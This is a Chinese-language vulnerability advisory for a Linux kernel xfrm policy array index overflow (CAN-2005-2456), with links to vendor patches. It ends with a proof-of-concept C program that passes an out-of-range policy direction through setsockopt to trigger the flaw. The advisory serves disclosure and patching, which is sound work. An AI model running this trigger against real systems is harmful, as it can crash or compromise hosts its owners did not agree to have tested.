BUGTRAQ ID: 14477
CVE(CAN) ID: CAN-2005-2456
Linux Kernel是开放源码操作系统Linux所使用的内核。
Linux Kernel的xfrm_user.c文件的xfrm_sk_policy_insert函数中存在数组索引溢出。如果将大于XFRM_POLICY_OUT的p->dir值用作sock->sk_policy数组的索引的话,就可以触发这个漏洞,导致拒绝服务或执行任意代码。
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
<a href=“http://www.kernel.org/” target=“_blank”>http://www.kernel.org/</a>
RedHat已经为此发布了安全公告(RHSA-2005:663-01和RHSA-2005:514-01)以及相应补丁:
RHSA-2005:663-01:Updated kernel packages available for Red Hat Enterprise Linux 3 Update 6
链接:<a href=“http://lwn.net/Alerts/153520/?format=printable” target=“_blank”>http://lwn.net/Alerts/153520/?format=printable</a>
RHSA-2005:514-01: Updated kernel packages available for Red Hat Enterprise Linux 4 Update 2
链接:<a href=“http://lwn.net/Alerts/154615/?format=printable” target=“_blank”>http://lwn.net/Alerts/154615/?format=printable</a>
S.u.S.E.已经为此发布了一个安全公告(SUSE-SA:2005:050)以及相应补丁:
SUSE-SA:2005:050:kernel multiple security problems
链接:<a href=“http://www.novell.com/linux/security/advisories/2005_50_kernel.html” target=“_blank”>http://www.novell.com/linux/security/advisories/2005_50_kernel.html</a>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/xfrm.h>
#define IP_XFRM_POLICY 17
int
main()
{
int fd;
struct sockaddr_in s_in;
struct xfrm_userpolicy_info xp;
inet_aton("192.168.13.8", &s_in.sin_addr);
s_in.sin_family = AF_INET;
s_in.sin_port = htons(555);
fd = socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP);
if (fd < 0)
{
perror("socket");
return 1;
}
if (connect(fd, (struct sockaddr *) &s_in, sizeof(s_in)) < 0)
{
perror("connect");
return 1;
}
inet_aton("192.168.13.7", (struct in_addr *) &xp.sel.saddr);
xp.sel.prefixlen_s = 32;
inet_aton("192.168.13.8", (struct in_addr *) &xp.sel.daddr);
xp.sel.prefixlen_d = 32;
xp.sel.dport = 0;
xp.sel.dport_mask = 0;
xp.sel.sport = 0;
xp.sel.sport_mask = 0;
xp.sel.family = AF_INET;
xp.sel.proto = 0;
xp.sel.ifindex = 0;
xp.sel.user = 0;
xp.lft.soft_byte_limit = 10000000;
xp.lft.hard_byte_limit = 10000000;
xp.lft.soft_packet_limit = 10000000;
xp.lft.hard_packet_limit = 10000000;
xp.lft.soft_add_expires_seconds = 3600;
xp.lft.hard_add_expires_seconds = 3600;
xp.lft.soft_use_expires_seconds = 3600;
xp.lft.hard_use_expires_seconds = 3600;
xp.curlft.bytes = 0;
xp.curlft.packets = 0;
xp.curlft.add_time = 0;
xp.curlft.use_time = 0;
xp.priority = 0;
xp.index = 0;
xp.dir = XFRM_POLICY_FWD;
xp.action = XFRM_POLICY_ALLOW;
xp.flags = 0;
xp.share = XFRM_SHARE_UNIQUE;
if (setsockopt(fd, SOL_IP, IP_XFRM_POLICY, &xp, sizeof(xp)) < 0)
{
perror("setsockopt(IP_XFRM_POLICY)");
return 1;
}
send(fd, "abrakadabra", 11, 0);
close(fd);
}